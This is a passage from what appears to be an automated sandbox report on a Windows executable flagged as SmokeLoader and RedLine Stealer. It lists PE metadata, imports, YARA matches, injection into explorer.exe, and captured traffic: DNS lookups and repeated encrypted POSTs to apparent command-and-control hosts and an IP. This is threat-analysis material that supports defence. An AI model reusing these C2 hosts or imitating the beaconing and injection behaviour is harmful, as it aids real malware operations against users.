OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5f7126027ff537a60748c378e10145e6

Entrypoint Preview

Instruction
call 00007F3BD4BEA71Ch
jmp 00007F3BD4BE449Dh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F3BD4BE4646h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F3BD4BE4670h
test ecx, 00000003h
jne 00007F3BD4BE4611h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F3BD4BE460Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F3BD4BE4654h
test ah, ah
je 00007F3BD4BE4646h
test eax, 00FF0000h
je 00007F3BD4BE4635h
test eax, FF000000h
je 00007F3BD4BE4624h
jmp 00007F3BD4BE45EFh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
cmp ecx, dword ptr [0042C770h]
jne 00007F3BD4BE4624h
rep ret
jmp 00007F3BD4BEA706h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x17ea4	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x31000	0x1a0e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c000	0xe0c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1230	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x52b0	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1dc	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1798a	0x17a00	False	0.5888206845238095	data	6.690204553747697	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x19000	0x17298	0x14c00	False	0.7701548381024096	data	6.902230084257738	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x31000	0x1a0e0	0x1a200	False	0.630775269138756	data	6.520608323160902	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4c000	0x1d6e	0x1e00	False	0.40078125	data	3.9902482462929365	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x49318	0xe	data	French	Switzerland
KUNADOREHUMENANAMOVIZO	0x46c68	0x2626	ASCII text, with very long lines (9766), with no line terminators	French	Switzerland
SENUZEMIX	0x46328	0x940	ASCII text, with very long lines (2368), with no line terminators	French	Switzerland
RT_ICON	0x318f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Georgian	Georgia
RT_ICON	0x32798	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Georgian	Georgia
RT_ICON	0x33040	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Georgian	Georgia
RT_ICON	0x355e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Georgian	Georgia
RT_ICON	0x36690	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Georgian	Georgia
RT_ICON	0x36b48	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Georgian	Georgia
RT_ICON	0x37210	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Georgian	Georgia
RT_ICON	0x397b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Georgian	Georgia
RT_ICON	0x39c50	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Georgian	Georgia
RT_ICON	0x3aaf8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Georgian	Georgia
RT_ICON	0x3b3a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Georgian	Georgia
RT_ICON	0x3ba68	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Georgian	Georgia
RT_ICON	0x3bfd0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Georgian	Georgia
RT_ICON	0x3e578	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Georgian	Georgia
RT_ICON	0x3f620	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Georgian	Georgia
RT_ICON	0x3faf0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Georgian	Georgia
RT_ICON	0x40998	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Georgian	Georgia
RT_ICON	0x41240	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Georgian	Georgia
RT_ICON	0x41908	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Georgian	Georgia
RT_ICON	0x41e70	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Georgian	Georgia
RT_ICON	0x44418	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Georgian	Georgia
RT_ICON	0x454c0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Georgian	Georgia
RT_ICON	0x45e48	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Georgian	Georgia
RT_DIALOG	0x49518	0x78	data	French	Switzerland
RT_STRING	0x49590	0x376	data	French	Switzerland
RT_STRING	0x49908	0x4fc	data	French	Switzerland
RT_STRING	0x49e08	0x3b8	data	French	Switzerland
RT_STRING	0x4a1c0	0x4d2	data	French	Switzerland
RT_STRING	0x4a698	0x51c	data	French	Switzerland
RT_STRING	0x4abb8	0x528	data	French	Switzerland
RT_ACCELERATOR	0x49290	0x60	data	French	Switzerland
RT_ACCELERATOR	0x492f0	0x28	data	French	Switzerland
RT_GROUP_ICON	0x36af8	0x4c	data	Georgian	Georgia
RT_GROUP_ICON	0x3fa88	0x68	data	Georgian	Georgia
RT_GROUP_ICON	0x39c20	0x30	data	Georgian	Georgia
RT_GROUP_ICON	0x462b0	0x76	data	Georgian	Georgia
RT_VERSION	0x49328	0x1ec	data	French	Switzerland

Imports

DLL	Import
KERNEL32.dll	LoadLibraryA, GetModuleHandleA, InterlockedCompareExchange, OpenWaitableTimerA, CreateEventA, ReadConsoleInputW, WaitNamedPipeW, SetVolumeMountPointA, SetSystemTimeAdjustment, FindNextFileW, EnumResourceTypesA, GetModuleFileNameW, IsBadCodePtr, LoadLibraryW, DeleteFileW, SearchPathA, VirtualAlloc, WriteConsoleOutputCharacterW, GetConsoleAliasA, GetShortPathNameW, GetPrivateProfileStringW, PeekConsoleInputW, GlobalGetAtomNameA, GetProcAddress, GetUserDefaultLangID, GetConsoleAliasW, FindFirstChangeNotificationW, GetFileType, SetFileShortNameW, lstrcpynA, AddAtomW, SetConsoleCtrlHandler, CreateMutexA, GetLongPathNameA, FoldStringW, ResetEvent, GlobalWire, GetComputerNameA, GetVersionExW, GetSystemDefaultLCID, GetProcessHandleCount, GetLastError, VirtualProtect, GlobalAlloc, SetCalendarInfoW, SetComputerNameA, GetFileAttributesA, GetVolumePathNameW, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, GetCommandLineA, GetStartupInfoA, HeapAlloc, HeapFree, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, DeleteCriticalSection, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, InitializeCriticalSectionAndSpinCount, SetFilePointer, ReadFile, GetConsoleCP, GetConsoleMode, CloseHandle, CreateFileA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEndOfFile, GetProcessHeap
ole32.dll	OleQueryCreateFromData
WINHTTP.dll	WinHttpCloseHandle

Possible Origin

Language of compilation system	Country where language is spoken	Map
French	Switzerland
Georgian	Georgia

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2022 23:15:11.089168072 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:11.142709017 CEST	80	49704	176.124.192.17	192.168.2.3
Sep 29, 2022 23:15:11.142904043 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:11.144483089 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:11.144526005 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:11.421988964 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:11.734468937 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:12.343956947 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:13.547161102 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:14.750341892 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:15.953511953 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:18.360029936 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:18.423057079 CEST	80	49704	176.124.192.17	192.168.2.3
Sep 29, 2022 23:15:18.423149109 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:18.440016985 CEST	49704	80	192.168.2.3	176.124.192.17
Sep 29, 2022 23:15:18.493499994 CEST	80	49704	176.124.192.17	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2022 23:15:10.759139061 CEST	57840	53	192.168.2.3	8.8.8.8
Sep 29, 2022 23:15:11.085274935 CEST	53	57840	8.8.8.8	192.168.2.3
Sep 29, 2022 23:15:18.474919081 CEST	57990	53	192.168.2.3	8.8.8.8
Sep 29, 2022 23:15:19.506906986 CEST	57990	53	192.168.2.3	8.8.8.8
Sep 29, 2022 23:15:20.997066021 CEST	57990	53	192.168.2.3	8.8.8.8
Sep 29, 2022 23:15:22.502342939 CEST	53	57990	8.8.8.8	192.168.2.3
Sep 29, 2022 23:15:23.531378031 CEST	53	57990	8.8.8.8	192.168.2.3
Sep 29, 2022 23:15:25.035106897 CEST	53	57990	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Sep 29, 2022 23:15:23.531533957 CEST	192.168.2.3	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable
Sep 29, 2022 23:15:25.035270929 CEST	192.168.2.3	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 29, 2022 23:15:10.759139061 CEST	192.168.2.3	8.8.8.8	0x48a1	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Sep 29, 2022 23:15:18.474919081 CEST	192.168.2.3	8.8.8.8	0x81b3	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Sep 29, 2022 23:15:19.506906986 CEST	192.168.2.3	8.8.8.8	0x81b3	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Sep 29, 2022 23:15:20.997066021 CEST	192.168.2.3	8.8.8.8	0x81b3	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 29, 2022 23:15:11.085274935 CEST	8.8.8.8	192.168.2.3	0x48a1	No error (0)	host-file-host6.com		176.124.192.17	A (IP address)	IN (0x0001)	false
Sep 29, 2022 23:15:22.502342939 CEST	8.8.8.8	192.168.2.3	0x81b3	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false
Sep 29, 2022 23:15:23.531378031 CEST	8.8.8.8	192.168.2.3	0x81b3	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false
Sep 29, 2022 23:15:25.035106897 CEST	8.8.8.8	192.168.2.3	0x81b3	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

rleect.net

host-file-host6.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49704	176.124.192.17	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 29, 2022 23:15:11.144483089 CEST	106	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rleect.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: host-file-host6.com
Sep 29, 2022 23:15:11.144526005 CEST	107	OUT	Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Sep 29, 2022 23:15:11.421988964 CEST	107	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rleect.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: host-file-host6.com Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Sep 29, 2022 23:15:11.734468937 CEST	108	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rleect.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: host-file-host6.com Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Sep 29, 2022 23:15:12.343956947 CEST	108	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rleect.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: host-file-host6.com Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Sep 29, 2022 23:15:13.547161102 CEST	109	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rleect.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: host-file-host6.com Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Sep 29, 2022 23:15:14.750341892 CEST	109	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rleect.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: host-file-host6.com Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Sep 29, 2022 23:15:15.953511953 CEST	110	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rleect.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: host-file-host6.com Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Sep 29, 2022 23:15:18.360029936 CEST	110	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rleect.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 203 Host: host-file-host6.com Data Raw: 10 87 f7 e5 19 86 a6 c3 be 3e 79 40 08 ce 91 8a 45 63 dd 44 a5 43 6e ea ca eb af 85 8f a7 94 f7 6b ba 58 a3 6c 1c c9 97 9c a8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 44 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 1f cd aa 2e 19 bb 18 74 b6 3a 10 41 45 16 88 94 ec 2c a0 b5 9a e7 3f 60 5c 03 03 88 0b 49 e9 7f 32 63 19 90 1b f7 99 21 b0 02 65 5a 29 f6 e8 73 29 50 d5 4b c6 c7 3d 3a e2 b7 49 83 56 3b 47 ea 7e d6 58 f6 ab c5 d8 c1 55 b8 3e 85 53 62 13 2d 1e 9c 4a 90 8c 4f 98 de 78 ca bb 0c 5d 20 d9 9c e1 fe c8 1e 59 f5 9b 99 8b e4 67 4f b7 eb f7 d2 4d 0a 6e 64 3c 97 ed 43 6c 21 ba f6 ea Data Ascii: >y@EcDCnkXlwmDu$f]d.t:AE,?`\I2c!eZ)s)PK=:IV;G~XU>Sb-JOx] YgOMnd<Cl!
Sep 29, 2022 23:15:18.423057079 CEST	110	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Thu, 29 Sep 2022 21:15:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: fYour IP blocked0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ikNC1JE7rY.exePID: 5644, Parent PID: 5984

General

Target ID:	0
Start time:	23:13:48
Start date:	29/09/2022
Path:	C:\Users\user\Desktop\ikNC1JE7rY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ikNC1JE7rY.exe"
Imagebase:	0x400000
File size:	297472 bytes
MD5 hash:	44F5530502DB25E5E66C15260EC4D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.318569680.000000000062B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: ikNC1JE7rY.exePID: 4788, Parent PID: 5644

General

Target ID:	10
Start time:	23:14:20
Start date:	29/09/2022
Path:	C:\Users\user\Desktop\ikNC1JE7rY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ikNC1JE7rY.exe"
Imagebase:	0x400000
File size:	297472 bytes
MD5 hash:	44F5530502DB25E5E66C15260EC4D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.394301039.0000000000680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.394330226.00000000006A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 4788

General

Target ID:	11
Start time:	23:14:25
Start date:	29/09/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: sifdvgfPID: 2368, Parent PID: 1080

General

Target ID:	12
Start time:	23:15:11
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Roaming\sifdvgf
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\sifdvgf
Imagebase:	0x400000
